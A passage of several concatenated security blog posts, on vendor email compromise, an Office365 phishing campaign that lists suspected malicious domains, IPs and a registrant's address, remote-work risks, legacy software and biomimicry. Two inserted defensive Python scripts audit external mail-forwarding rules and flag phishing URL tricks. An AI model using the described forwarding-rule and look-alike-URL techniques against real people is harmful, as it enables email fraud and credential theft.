Secondly, they would set up email rules to forward, or even redirect, copies of all incoming emails from the respective vendors to the scammers’ inboxes. Once these rules are created, victims are unlikely to notice any sign that someone is spying on their email accounts. Thus, cybercriminals can continue their activity for a long time and evade detection.

For instance, the Silent Starling attackers had access for over four months to employees’ email accounts from a US-based real estate company. During this period, they received more than 2,800 confidential emails containing “income statements, invoices, customer agreements, rental injury process, and other policy paperwork”, Agari notes. 
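
The forwarding and redirect rules described in Phase #2 are the one artefact a defender can audit directly. The script below is an added example, not Heimdal’s or Agari’s code: it takes a list of inbox rules (a constructed, simplified record format with hypothetical field names; real exports from Exchange Online or Google Workspace have their own schemas), flags every rule that sends mail to an address outside the organization, and scores it higher when the rule redirects rather than copies, deletes the message afterwards, or is scoped to a known vendor’s mail, which is the exact pattern a VEC takeover leaves behind.

```python
"""Audit mailbox inbox rules for forwarding or redirection to external addresses.

Added example, not code from the Heimdal post or from Agari. The rule records
and domain lists below are constructed sample data with hypothetical fields.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class InboxRule:
    mailbox: str                       # owner of the rule
    name: str                          # rule name (attackers often use "." or a single space)
    forward_to: List[str] = field(default_factory=list)   # copies go here, owner still gets the mail
    redirect_to: List[str] = field(default_factory=list)  # mail goes here instead of the owner
    delete_after_forward: bool = False                    # hides the message from the owner
    from_filter: List[str] = field(default_factory=list)  # senders/domains the rule matches on


def domain_of(address: str) -> str:
    """Return the domain part of an address, or the string itself if it is already a domain."""
    return address.rsplit("@", 1)[-1].lower()


def audit_rules(rules: List[InboxRule], internal_domains: List[str],
                vendor_domains: List[str]) -> List[Dict]:
    """Return findings for rules that leak mail outside the organization, highest risk first."""
    internal = {d.lower() for d in internal_domains}
    vendors = {d.lower() for d in vendor_domains}
    findings = []
    for rule in rules:
        external = [t for t in rule.forward_to + rule.redirect_to
                    if domain_of(t) not in internal]
        if not external:
            continue                                   # internal-only rules are normal
        score, reasons = 1, ["sends mail to external address(es): " + ", ".join(external)]
        if rule.redirect_to:
            score += 1
            reasons.append("uses redirect, so the owner never sees the message")
        if rule.delete_after_forward:
            score += 1
            reasons.append("deletes messages after forwarding")
        vendor_hits = [f for f in rule.from_filter if domain_of(f) in vendors]
        if vendor_hits:
            score += 2
            reasons.append("scoped to vendor mail from: " + ", ".join(vendor_hits))
        findings.append({"mailbox": rule.mailbox, "rule": rule.name,
                         "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample data (placeholder .test domains, not real organizations).
INTERNAL_DOMAINS = ["example-realty.test"]
VENDOR_DOMAINS = ["acme-supplies.test"]
SAMPLE_RULES = [
    InboxRule("ap.clerk@example-realty.test", "Newsletters to folder"),
    InboxRule("ap.clerk@example-realty.test", "Cover while on leave",
              forward_to=["assistant@example-realty.test"]),
    InboxRule("ap.clerk@example-realty.test", ".",
              redirect_to=["collector@mail-drop.test"],
              from_filter=["billing@acme-supplies.test"],
              delete_after_forward=True),
    InboxRule("sales.rep@example-realty.test", "Copy to personal",
              forward_to=["rep.home@personal-mail.test"]),
]

if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES, INTERNAL_DOMAINS, VENDOR_DOMAINS):
        print(f"[score {finding['score']}] {finding['mailbox']} rule {finding['rule']!r}")
        for reason in finding["reasons"]:
            print("    -", reason)
```

Running it on the sample data reports the redirect rule named “.” on the accounts-payable mailbox with the top score and the personal-forwarding rule as a lower-priority finding, while the two internal rules are ignored. Scheduling such an audit across all mailboxes is a cheap way to shorten the months-long dwell time the post describes.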

Phase #3. The waiting game begins 

VEC attacks are based on lengthy processes, during which cybercriminals harvest as much sensitive information as they need to in order to be able to masquerade as real vendor representatives. This is one of the main differences between VEC and BEC since the latter usually takes advantage of an individual’s innate tendency to respond to urgency.  

During this phase, fraudsters are trying to figure out information such as: 

  • Vendor’s customers 
  • Invoice look and feel 
  • Customer payments due dates 
  • Due amounts 
  • Customer contacts responsible for payments 

A high volume of emails floods their inbox, so these scammers are most probably using automated tools to identify keywords related to payments and invoices rather than manually reading each email.

Phase #4. Spear phishing emails are sent to the vendor’s customers

After cybercriminals have gathered enough information from the compromised accounts, they will start the next phase of the VEC attack: crafting authentic-looking spear phishing emails and sending them to the vendor’s customers. Just like in a standard BEC attack, the goal is to trick the victim into transferring money to the fraudster’s account. 

According to Agari, there are three primary aspects that need to be correctly identified by VEC attackers in order for the scams to be successfully conducted: 

  • Vendor identity – Here, employees responsible for customer billing coming from the vendor’s side need to be correctly identified. Then, they can be impersonated in three ways: 
    1. The fraudster logs into the compromised account directly. 
    2. The victim’s email address is spoofed. 
    3. The attacker registers a domain that looks very similar to the vendor’s official domain. 
  • Emails’ content – VEC scammers always do their best to mimic the way a vendor representative writes an email to appear more genuine and may even copy their email signature. 
  • Timing – Attackers need to send payment requests on the exact dates that past invoices were due, in order not to arouse suspicion.

 Vendor Email Compromise VEC 

Source: Agari.com

A comparison between VEC and BEC 

How is Vendor Email Compromise different from Business Email Compromise and how are they similar? 

Below you can find a quick comparison between VEC and BEC:

Business Email Compromise (BEC) vs. Vendor Email Compromise (VEC)

In both cases, attackers need access to a business email account or use spoofed email addresses to trick their targets into transferring money to their bank accounts.

BEC: A traditional BEC attack takes place inside the targeted organization. Example: The fraudster impersonating the CEO asks someone from the organization to make a payment.
VEC: Attackers break into the vendor’s email accounts and target their customers. Ironically, the initial target (the vendor) will not be affected financially at all. Example: The fraudster impersonating an employee who works in the vendor’s financial department sends a fake invoice to the customer.

BEC: Usually, attackers collect information about their targets from social media and other places publicly available online.
VEC: Based on multiple stages, during which the attacker gathers relevant information about the target so they can perfectly imitate them (i.e. the way the targeted employees formulate emails, email endings, email signature, etc.).

BEC: Scammers use a sense of urgency in their communication with the targeted customer.
VEC: VEC attacks require extreme patience. Attackers do an extensive amount of research to find out as much valuable information as they can about their targets.

How to protect your business from VEC/BEC attacks 

Naturally, it will be quite difficult for anyone to identify VEC attacks, regardless of whether you’re a vendor or a customer employee. These attacks could go on for months and months without being detected. And since traditional cybersecurity solutions are not able to pick up these types of advanced threats, a mix of human vigilance and the right security tools is what it takes to prevent and stop them before they damage your organization.

So, how can Business/Vendor Email Compromise be avoided?  

1. Train your employees 

First, your staff should be able to identify the tell-tale signs of phishing (suspicious sender email address/URL, the sender asking them to “update” their credentials or “verify” their identity, etc.).

This basic knowledge can be accumulated through regular cybersecurity training, so make sure all your employees are on the same page when it comes to identifying phishing and other types of cyberattacks. 

Secondly, your organization should use a next-gen proactive antimalware solution that blocks malicious links if your employees accidentally click them.

2. Implement multi-factor authentication methods 

Let’s suppose your employees could not tell they were the victims of a phishing attack and that you were not using the right cybersecurity solution that could have prevented the attack.

After obtaining your employees’ credentials, attackers will try to log in to their email accounts. So, a good method to prevent unauthorized access is multi-factor authentication. I’ve written extensively about password security best practices here, so feel free to check out this guide as well.

3. Constantly review your cybersecurity policy 

Accompanied by your mandatory training should be your cybersecurity policy, so make sure you have one in place and update it whenever necessary. Don’t just keep an antiquated one that becomes obsolete as cyber threats develop.  

Your company’s cybersecurity policy should cover best practices that everyone must follow, as well as actionable steps your employees must take at the first signs of compromise.

What’s more, don’t forget about your remote employees. Your cybersecurity policy should have a section specially dedicated to remote workers, who may sometimes be at higher risk than your on-site staff. I encourage you to also take a look at the guide in which I explain what the cybersecurity issues with remote work are and how to address them.

4. Use a next-generation email fraud protection solution 

There are certain advanced threats that can’t be detected and blocked by traditional spam filters. A standard email security solution will not be able to identify business email compromise: fake money-transfer requests, CEO impersonation/impostor emails, malicious content in historical emails, spoofed emails, etc.

This is why we’ve developed MailSentry™, an email security solution specifically designed to quickly detect fraud and fake invoices, which will help you save time and skip manual background checks.

MailSentry™ works as an add-on to existing spam filter solutions.

It scans email content and attachments for fraudulent account numbers, invoice modifications, and signs of imposters. It’s based on Artificial Intelligence that detects the signs of the most advanced cyber threats. Furthermore, it uses more than 125 vectors of analysis and is fully coupled with live threat intelligence to find and stop Business Email compromise, CEO Fraud, phishing, and complex malware. Not only that, but it’s also backed up by a live 24/7 anti-fraud specialist team.

MailSentry™ is the only next-gen email security solution in the world connected to bank systems, capable of cross-checking IBAN and account numbers against money mule accounts.

Conclusion 

Business Email Compromise is one of the fastest-growing threats of today’s threatscape. As cybercriminals continue to improve their attack techniques to better evade detection, it will become increasingly harder for you to keep your confidential data and money safe. 

If you are a vendor, train your employees to be extra cautious when establishing any kind of contact with both your customers and internal stakeholders. If you are a company engaged in business relationships with vendors, the same rules apply. Without doubt, you can never be too careful, as you never know where malicious actors and advanced cyber threats may be hiding. Yet, the good news is that your business can and will remain protected and competitive if you take into account all the necessary preventive measures. 

The post Vendor Email Compromise (VEC): The Classic Business Email Compromise (BEC) Scheme with a Spin appeared first on Heimdal Security Blog.

New Microsoft Phishing Campaign Targets Office365 Users

We found evidence of a new Microsoft Phishing Campaign which is targeting Office365 users in particular, but general computer users with a Microsoft account as well. The most troubling aspect of this new campaign is its next degree of complexity.

Even if the tech behind the phishing is not exactly advanced itself, the fact that the attackers are using multiple attack vectors is enough to give pause. From the data we have gathered, we are sad to realize that this new Microsoft phishing campaign is a very solid attack. Everyone who uses a Microsoft account, especially in a business context, should be on their guard.

How this New Microsoft Phishing Campaign Works

Like all phishing campaigns, the aim of these scammers is to get you to enter your credentials in one of their own pages. These phishing pages are masquerading as official Microsoft and OneDrive pages.

The incentive for users to enter their credentials is retrieving an important work-related document. The form may vary, but it’s something that either references an older conversation (‘Here is the intelligence report we discussed…’) or money (‘Here is your invoice…’). For most people, the drive to open such attachments is quite strong.

Links to The Phishing Domains (Sometimes) Come from Compromised LinkedIn Accounts

This is what makes this newest Microsoft phishing campaign so dangerous: it relies on compromised accounts to spread the message. It’s not just shots fired into the dark.

The first step seems to be hacking into someone’s account and then using it to further spread the malicious message. This lends more credibility to the phishing invitation when it arrives in the inbox of the next targets.

Just like in Business Email Compromise (BEC) attacks, the victim believes they are communicating with an acquaintance or a colleague, someone they trust. Someone in our company received this message on LinkedIn, from another person they knew in real life and trusted:

linkedin phishing

The Next Steps in the Microsoft Phishing Campaign

Once the user clicks on the malicious attachment in the Microsoft phishing campaign, they will be redirected to a seemingly legit OneDrive portal.

screenshot of malicious onedrive attachment

After clicking the attachment, the user will then be redirected to a fake Microsoft Office365 portal where they will be asked for their credentials.

microsoft onedrive phishing attempt

If you look at the web address of the page, it’s clearly not what it should be.

Who’s Behind the Wave of Attacks

We identified two domains behind this Microsoft phishing campaign so far, but more will probably spring up in the following weeks.

The first domain, iradistribution.sofiatsola.com, has all its registration information blocked or modified to show that it is withheld under GDPR. This hides all information about which entity registered it, where they are based, and so on. Until the block is lifted because of the malicious activity, the hackers have enough time to do their worst. The IP address of this domain is 67.222.38.76, but the rest of the information is hidden.

VirusTotal has not identified it as malicious yet. According to its registry data, the domain was first created 15 years ago and modified 5 months ago. This indicates that the phishing campaign has been around for a while.

The second domain, markaldriedgehomes.com, still has all its information visible. The IP addresses it uses are 45.60.98.93 and 69.89.31.241. The domain is handled from a US Texas address by an admin with the email dc75a9c3ee070d94s@YAHOO.COM.

VirusTotal does mark this one as suspicious, but the domain is still not blocked by most cybersecurity solutions yet. Just like the first domain, and hardly a coincidence, this one was also updated 5 months ago.

Note of caution: The fact that the attackers are combining several tactics in a concentrated attack is disconcerting. Considering that they first compromised the accounts of real people and then used them as a launcher for the next wave of attacks, we advise full caution.

If you get any kind of message that requires a sign-in to download something, check and double-check the domain name and the authenticity of the request, even if the message doesn’t look like the examples above.
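
“Look at the web address of the page” is good advice, but most people do not know which part of the address matters. The following is an added example (not code from the post): it pulls the host out of a login URL and checks whether it really belongs to the brand the page claims to be, catching the tricks phishing pages rely on, such as a brand name placed in a subdomain, a raw IP address, a username before “@” that displays a trusted name, or plain HTTP. The allowlist is a small, assumed subset of well-known Microsoft login domains, and the sample URLs are constructed placeholders, not the live domains named above.

```python
"""Check whether a login URL actually belongs to the brand it appears to be.

Added example, not from the Heimdal post. BRAND_DOMAINS is an assumed,
deliberately short allowlist; a real deployment would maintain a complete
list. Sample URLs use constructed .test hosts and documentation IP ranges.
"""
from ipaddress import ip_address
from typing import Dict, List, Tuple
from urllib.parse import urlparse

BRAND_DOMAINS: Dict[str, List[str]] = {
    "microsoft": ["microsoft.com", "microsoftonline.com", "live.com", "office.com"],
    "onedrive": ["onedrive.com", "live.com", "sharepoint.com"],
}


def host_matches(host: str, allowed: str) -> bool:
    """True only if host IS the allowed domain or a subdomain of it (suffix match on a label boundary)."""
    return host == allowed or host.endswith("." + allowed)


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def assess_login_url(url: str) -> Tuple[str, str, List[str]]:
    """Return (verdict, host, findings); verdict is 'ok' or 'suspicious'."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    findings: List[str] = []
    if parts.scheme != "https":
        findings.append("not served over https")
    if parts.username is not None:
        # https://login.microsoftonline.com@evil.test/ shows a trusted name but goes to evil.test
        findings.append(f"text before '@' is a username, the real host is '{host}'")
    if is_ip_literal(host):
        findings.append("host is a raw IP address, not a brand domain")
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("internationalized (punycode) host label, check for look-alike characters")
    lowered = url.lower()
    for brand, allowed in BRAND_DOMAINS.items():
        if brand in lowered and not any(host_matches(host, d) for d in allowed):
            findings.append(f"mentions '{brand}' but host '{host}' is not a known {brand} domain")
    return ("suspicious" if findings else "ok", host, findings)


SAMPLE_URLS = [  # constructed examples, not real phishing pages
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "https://onedrive-documents.example-phish.test/office365/login.php",
    "https://microsoft.com.example-phish.test/login",
    "https://login.microsoftonline.com@example-phish.test/login",
    "http://192.0.2.10/onedrive/",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        verdict, host, findings = assess_login_url(sample)
        print(f"{verdict:10} {host:40} {sample}")
        for finding in findings:
            print("           -", finding)
```

Only the first sample passes; each of the others fails for the reason printed beside it. The rule to teach users is the one the code applies: the part of the address that counts is the registered domain immediately before the first “/”, read from the right, and nothing that appears before it or after it makes a page trustworthy.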

How to Stay Safe from this Microsoft Phishing Campaign and Similar Threats

#1. Learn more about phishing and spear phishing

Keep yourself up to date with the tactics of scammers, so you know how to recognize them when they are used against you.

Spear phishing should be something to be especially mindful of. Spear phishing is a highly targeted phishing scam aimed at the head of an enterprise or anyone in an executive position. Such a campaign is carefully planned and tailored to maximize the chances that the person falls for it.

Read our complete guide on spear-phishing to learn how it works and how to stay safe.

While you’re at it, you might also be interested in this guide on social engineering. Phishing is just one of the ways hackers can get to you by abusing human nature and our desire to trust. Learn the rest of the tricks to be mindful of by brushing up on your social engineering knowledge.

#2. Have a strong DNS traffic filtering solution

Of course, vigilance is not enough. You also need a strong DNS filtering solution that can identify and block the domains behind fake websites before the connection is made.

As long as you have that protecting your endpoints and you remain wary of sharing your credentials, nothing will disrupt you. Stay safe!

The post New Microsoft Phishing Campaign Targets Office365 Users appeared first on Heimdal Security Blog.

What Are The Cybersecurity Issues With Remote Work

Remote work has become a highly popular and common practice around the world. According to the latest International Workplace Group report, 50% of employees globally are now working outside of their main office headquarters for at least 2.5 days per week. 80% of the same survey respondents indicated that out of two similar employment offers, they would decline the one that doesn’t offer the remote work possibility. What’s more, 75% of people consider flexible working to be the new normal. So it’s clear that remote work is here to stay.

However, while this practice increases flexibility, improves productivity and enhances work-life balance, there’s a downside to it. The problem here is that there are real cybersecurity issues with remote work that put your company’s sensitive data at risk.

Cybersecurity and Remote Work Statistics

In a recent study, OpenVPN reported that 90% of IT professionals believe remote workers are not secure. At the same time, over 70% think remote staff pose a greater risk than onsite employees. So, the good news is that experts are actually acknowledging the security risks of remote work, and this is the first step towards addressing the issue.

remote workers are not secure

Image source: Openvpn.net

The Cybersecurity Issues with Remote Work

You may have a fully remote workforce, people who work from home from time to time, or employees who frequently go on business trips. And without a doubt, it’s more difficult to take care of their security than it is to manage your on-site endpoints.

Here are three bad habits related to remote work that your remote workers may have picked up and that endanger your organization:

1. Accessing sensitive data through unsafe Wi-Fi networks

Your employees could be connecting to their home wireless network or accessing their corporate accounts using unsecured public Wi-Fi. This way, malicious actors nearby can easily spy on their connection and harvest confidential information. For instance, data sent unencrypted, in plain text, can be intercepted and stolen by cybercriminals. For this reason, your employees should not be allowed to access any unknown Wi-Fi networks unless they are using a VPN connection.

2. Using personal devices for work

46% of employees admitted to transferring files between work and personal computers when working from home, which is a worrying practice.

At the same time, a trend of allowing employees to use their personal devices at work, commonly referred to as “Bring Your Own Device” or BYOD policy, has appeared.

You need to be fully aware of the issues involved in your employees using their personal devices for work-related matters. For instance, they may suddenly leave the company while holding on to the confidential information stored on their device during their employment, and you will not get the chance to erase it.

What’s more, they may not be keeping their software up-to-date, which opens up security holes in your environment. We keep stressing the importance of applying software patches in a timely manner and for a good reason.

Consequently, we would advise against letting your employees use their personal devices at work since it would be difficult for you to control what happens on their endpoints.

3. Ignoring basic physical security practices in public places

Even if cybersecurity is our focus, we can’t completely leave physical security behind when it comes to your company’s sensitive information. For example, there are employees who may be talking loudly on the phone while working in public places, expose their laptop’s screen for the entire crowd inside a café to see or even leave their devices unattended.

Teach your employees even the most basic security measures, even if they may seem like common sense at first glance. A friendly reminder for them not to expose the data of your business will always be of great benefit.

Creating a work-from-home security policy

So, how do you protect your company’s private data when you can’t fully control the devices used to access your network? Where should you start to make sure your remote workforce is secure?

The first step is to create a security policy specifically designed for remote workers. 93% of the IT professionals interviewed in the OpenVPN study already have a formalized remote work policy in place, and this is quite impressive and reassuring.

Below are the essential security clauses that should be included in your remote work policy:

  • Clearly define which positions are eligible for remote work.

Be transparent towards your employees. Everyone should be aware which job functions are allowed to work remotely and which are not, due to security reasons. Unfortunately, not every position is a good fit for remote work. If you don’t have a clear guide in place, chances are your work-from-home approvals will be judged as unfair.

  • List the tools and platforms they should be using.

Both your remote and on-site employees should be on the same page at all times and use the same approved tools, such as cloud storage platforms, communication/video conferencing tools, project management tools, etc.

  • Provide employees with steps to follow at the first signs of account compromise.

If they believe the company’s information has been compromised, they should have a clear guide to follow: where to report the incident, an instruction to immediately change their passwords, etc. These steps should be included in their mandatory cybersecurity training, alongside other items such as how to create strong passwords.

What Solutions Your Remote Workforce Should Use For An Increased Security

Here are the fundamental tools that both your regular and remote employees should have installed on their devices:

1. Multi-factor authentication

This type of authentication acts as an additional layer of security on top of your remote employees’ accounts. The more security layers in place, the lower the risk of a cybercriminal gaining access to your sensitive systems.

2. Password Manager

Besides multi-factor authentication, in regards to passwords, your employees should also be using a password manager. This way, they will not need to remember all of the different passwords that they need to set up for their work-related accounts.

3. VPN

VPN connections are crucial when your employees connect to unsecured networks, such as Wi-Fi hotspots, and even when they work from home. It’s recommended that your employees use your company’s VPN. A VPN routes their traffic through an encrypted tunnel to your organization’s private network, so anyone who intercepts the data on the way will not be able to read it. This way, your employees will also be able to connect to your company’s intranet, the private network designed to be used only by your company’s staff (in case you have one).

4. Firewall

A firewall prevents unauthorized access to and from the network, further strengthening the security of your employees’ devices. Firewalls monitor network traffic and block the traffic that is not wanted. So, firewalls are important tools that will protect your remote endpoints against various cyber threats.

5. A strong EDR solution

Last but not least, your system administrators should be able to see the exact details of your endpoints at all times. This is why it’s recommended you deploy a complete endpoint detection and response (EDR) solution that will allow you to remotely prevent next-gen malware and data leakage, respond quickly to threats, and automatically manage software deployment and patching.

Conclusion

It’s crucial for you to remain innovative and competitive in the current business landscape, and allowing your employees to work remotely is definitely a necessary step. Yet, remote work comes with security risks that you should address before you allow anyone to work from outside the office – no matter if we’re talking about permanent remote workers or the ones who do it just a few hours per month. Only when you correctly respond to this challenge will you be capable of fully seizing this opportunity, which increases talent retention and productivity and improves your staff’s work-life balance.

The post What Are The Cybersecurity Issues With Remote Work appeared first on Heimdal Security Blog.

What Is Legacy Software and a Legacy System in Business + The Risks

If you are leading a business or work within a business, this guide is definitely for you.

You have probably come across the term legacy software or legacy systems but don’t know exactly what they are. Or, even more likely, you are using legacy software or systems without even knowing it.

But there are risks and challenges associated with this (somewhat unavoidable) business practice.

Below I will explain everything there is to know about making the most you can out of legacy software and systems. As I said, it’s highly probable for a business older than a year to be using at least some tools which can be labeled as legacy tier.

First things first, though: let’s start by exploring what legacy software and legacy systems are. Typically, any medium to large company nowadays has at least a few legacy elements in its IT environment.

Next, we’ll move along to tips that can help you identify whether your legacy software or legacy system is one of the risky ones or not.

What Is Legacy Software? Definition(s)

To put it in as few words as possible, legacy software is any piece of software that can’t receive continued patching or support from its developer, or can’t meet the compliance standards in use.

Examples of enterprise-level legacy software can be quite varied.

Here are just a few cases which can be labeled as legacy software, to get a better idea of what it can encompass:

  • A major platform with no functional replacement (yet), still supported and compatible with other IT assets, but which does not receive security updates anymore;
  • An older piece of software that is still in use and receives support, but its creators are announcing the transition of support to the newer version of the product (such as the case of Python 2 vs Python 3);
  • A piece of software or platform which still gets updates but only for features (not security patches);
  • A piece of software or platform which still gets security updates and support but is no longer compliant with recent standards;
  • A piece of software or platform which gets updates and support but is not compatible with the newer systems and drivers in use (thus stalling the company’s adoption of those);

In some cases, the category of legacy software can include consumer-oriented software products issued by companies that no longer exist.

But, in spite of the discontinued support – and the discontinued official listing of that software (there’s nowhere to officially buy or download it from) – some users continue to procure it out of nostalgia.

Such is the case of Winamp media player, for example. There are entire Reddit forums dedicated to Winamp nostalgia, along with users still sharing custom made Winamp ‘skins’. There is also newly issued software that can emulate Winamp in-browser. So, the power of nostalgia for legacy software can still make the world go ‘round.

What Is a Legacy System in a Computer Industry Context?

A legacy system is a platform, hub or operating system (something which facilitates digital operations but sits one level above software) which is outdated.

This state of being outdated can refer to the fact that the system lacks the possibility of support, to its compatibility with other IT system elements, to its level of compliance, or to the updates it receives.

Myth Busting Legacy Software and Legacy Systems

Here are the most common misconceptions about legacy software and legacy systems.

#1. Legacy software is useless

False.

While legacy software and legacy systems still pose risks (which I’ll dive into below), it doesn’t mean they outlived their usefulness completely.

In many cases, a piece of legacy software or a legacy system is still in use precisely because it is the most comfortable option. Either there is no exact functional replacement yet, or the transition is still too difficult to weather.

Regardless of the exact reason, companies continue to use legacy software precisely because it’s still useful.

Ideally, yes, people should try to move on from legacy software as soon as it’s feasible, but things are always a bit more complicated in practice.

#2. Legacy software is free

False.

The opposite can be true: precisely because legacy software was quite an investment, companies may be reluctant to replace it yet. An investment only makes sense if the cost is recovered over a pre-determined use period.

In many cases, even subscription-based software and systems (which the company is still actively paying for) are in fact legacy ones. The recurrent fee ensures continuous support and perhaps even some feature updates, but the security patches are unsatisfactory, or the software is not compliant.

#3. Legacy software is unsupported

Not always.

As mentioned above and through the examples so far, there are cases when legacy software is still supported by an actual team and you can still get an account manager to troubleshoot stuff for you.

Regardless, no matter how active and involved the support team behind the software is, if it doesn’t get security updates or is non-compliant, it still counts as legacy software.

#4. Legacy software is dangerous

Not always.

I know that most sources you will consult about legacy software will seem to push you to replace it ASAP, on account of it being dangerous.

But the truth is that legacy software is not always dangerous. It depends a great deal on the specifics of the case.

I’ll get into more detail on how to mitigate the risks of legacy software below.

#5. Legacy software and legacy systems should be immediately replaced

False.

Just as legacy software is not always dangerous, so it does not always need to be replaced. It depends on the case and its specifics, not only those of the software but also of the company and its way of operating.

Before you decide whether a particular piece of legacy software needs to be replaced, you should do a case analysis. Applying software updates is a major hassle anyway for company IT admins unless they are already using smart patching automation software. No need to make that job even harder.

The Risks of Running Legacy Software and Systems in Your Business

Still, even if legacy software is not always dangerous, there are cases when it can definitely pose some risks.

Here are a few examples of such risks deriving from legacy software or legacy systems:

  • The risk of falling prey to a data breach or cyber-attack more easily;
  • The risk of slowing down the activity due to the performance issues or the need to manually fix issues regularly;
  • The risk of becoming non-compliant;

How to Mitigate the Risk of Legacy Software: 3 Ways

In order to avoid these three main types of risk deriving from legacy software or legacy systems, you just need to be proactive about it. Don’t wait until you are already facing a productivity crisis or, worse yet, a security breach.

The main ways to go about it are these:

#1. Consult with security experts about the legacy software elements in your IT environment

As mentioned above, it’s not always dangerous to stick to your legacy software or legacy system already in use. Sometimes the switch can involve costs that are not justified by the amount of risk you need to absorb. So, in some cases, it makes perfect sense to stick with the legacy software (and that’s exactly what some companies do).

Check with security experts to see what software absolutely poses a risk and what legacy software you can afford to continue using. Also, implement an automatic software patching solution in order to close potential security gaps and to make the life of your sys-admins easier.

#2. Do a case by case comparison between your legacy software and alternatives

Sometimes, the bad news is that legacy software that really needs to be replaced does not have a viable replacement yet.

But when it does, look into it just as you would look into any other business decision, with pros and cons. When you consider the (explicit) costs of updating, also consider the (implicit) costs of not updating. Is a potential breach easier to come back from than absorbing the costs of a change?

#3. Analyze the impediments to a transition from legacy software to non-legacy software

Also, in each case analysis, consider all the other variables and effort required for a transition. Compatibility and cost concerns are valid, but internal effort and time should not weigh so much in the final decision. Just because it will be a bit of a hassle doesn’t mean you should postpone indefinitely. That’s what gets companies on the breach list in most cases.

This concludes today’s guide on legacy software and legacy systems. If you have any questions or stories to share, feel free to comment below or contact me. I’m here to help if I can.

The post What Is Legacy Software and a Legacy System in Business + The Risks appeared first on Heimdal Security Blog.

Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature

Since digital systems have been built to, well, mimic the way living systems function and behave (and malware also mimics the way a virus infection or disease behaves in real life), cybersecurity and biology have more in common than you’d think. Here’s how we can take a fresh look at this congruence by exploring the concept of biomimicry.

When it comes to ecosystems, our information technology ecosystem is very, very young (for example, the global internet is only about 30 years old). Our planetary ecosystem, however, is well over 3 billion years old.

That’s 3-plus billion years of evolutionary innovation and natural intelligence that has inspired countless breakthroughs in the world of design — and that is now being tapped for game-changing new ideas in the high-stakes world of information security.

So, what can such creatures as the humble ant teach us about cybersecurity? Or for that matter, the chameleon or the Bornean moth?

Cybersecurity and Biology. The Idea of Biomimicry

Welcome to the fertile field of biomimicry which, according to Smithsonian Magazine (“How Biomimicry is Inspiring Human Innovation”), hinges on the notion that “we human beings, who have been trying to make things for only the blink of an evolutionary eye, have a lot to learn from the long processes of natural selection, whether it’s how to make a wing more aerodynamic or a city more resilient or an electronic display more vibrant.”

Or, in the case of cybersecurity, to make information systems and defenses more secure, resilient and adaptable.

The millions of species and organisms that have inhabited this planet far longer than humans have learned to adapt to life on earth uniquely, gracefully and sometimes with astonishing brilliance. As science author and biomimicry expert Janine Benyus put it, “they are our elders” so why not learn as much as we can from their “3.8 billion years of research and development.”

What is Biomimicry? [Several Definitions]


While the term is not familiar to everyone, humankind has used biomimicry since we first started wearing animal skins for warmth.

“One of the most often-cited examples is Velcro, which the Swiss engineer Georges de Mestral patented in 1955 after studying how burs stuck to his clothes,” according to the Smithsonian report. In other examples, “a fan created by Pax Scientific borrows from the patterns of swirling kelp, nautilus and whelks to move air more efficiently. A saltwater-irrigated greenhouse in the Qatari desert will use condensation and evaporation tricks gleaned from the nose of a camel.”

One of the best and simplest ways to think of biomimicry is “innovation inspired by nature.”

The term is believed to have been coined in 1982 and popularized by Janine Benyus in her 1997 book titled, you guessed it, “Biomimicry: Innovation Inspired by Nature.” Among the countless examples she cites is the Wright brothers employing biomimicry by observing pigeons and vultures and using them as inspiration in the creation of the first airplane.

“Our most clever architectural struts and beams are already featured in lily pads and bamboo stems. Our central heating and air-conditioning are bested by the termite tower’s steady 86 degrees F. Our most stealthy radar is hard of hearing compared to the bat’s multifrequency transmission. And our new ‘smart materials’ can’t hold a candle to the dolphin’s skin or the butterfly’s proboscis. Even the wheel, which we always took to be a uniquely human creation, has been found in the tiny rotary motor that propels the flagellum of the world’s most ancient bacteria,” she writes.

“Unlike the Industrial Revolution, the Biomimicry Revolution introduces an era based not on what we can extract from nature, but on what we can learn from her.”

In addition to her books, Benyus has delivered multiple TED Talks on the topic, including “Biomimicry’s Surprising Lessons From Nature’s Engineers” and “Biomimicry in Action.”

Here is how two of the leading organizations devoted to the study and advancement of biomimicry define the art and science of innovation inspired by nature.

“Biomimicry is an approach to innovation that seeks sustainable solutions to human challenges by emulating nature’s time-tested patterns and strategies.” (Biomimicry.org)

“Biomimicry is learning from and then emulating nature’s forms, processes, and ecosystems to create more sustainable designs.” (Biomimicry.net)

Biomimicry in Cyber Security: Digital Ants to the Rescue


Creating analogies between cybersecurity and biology is not exactly new. Since the very advent of cybersecurity, experts have described the spread of malware in terms borrowed from biology, such as ‘virus’, ‘infection’, ‘epidemic’ and so on. But biomimicry is a more refined and rigorous research field, which may be just what cybersecurity approaches need right now to gain focus. A fresh point of view is also always welcome, if only to avoid a monoculture approach.

Some people who are also enthusiastically adopting this blended approach of combining cybersecurity and biology insights are dubbing this bio-cybersecurity. They support the idea that it’s an entirely new field, warranting its own research. While time will tell on whether a new science is born or not, it’s clear that cybersecurity and biology can have a lot to learn from each other.

OK, so what can the humble ant teach us about cybersecurity?

Well, ants are known to work collaboratively to accomplish such tasks as building, defending and repairing their nests. According to a Wall Street Journal article by JR Reagan, global chief information security officer for Deloitte (“The Nature Lover’s Guide to Cyber Security”), cybersecurity researchers are applying this type of “swarm intelligence.”

In one project which beautifully blends cybersecurity and biology, so-called “digital ants” monitor systems for anomalies such as malware. The ants drop “markers” where unusual activity occurs, similar to the pheromonal markers ants place along paths to food. When the markers at a given location exceed a certain threshold, an alarm is triggered to alert human cybersecurity specialists.

Bornean moths and chameleons also possess innate intelligence and capabilities applicable to information security, writes Reagan. The moths, for example, protect themselves from birds by creating leaf tents. Using a similar principle, “data masking” shields sensitive personal information from unauthorized viewers by replacing it with phony data.

The chameleon fools predators by changing colors to blend in with its surroundings, rendering itself nearly invisible. In cybersecurity, a practice called steganography disguises sensitive data to make it look like something else, say a picture of a flower or a music file.

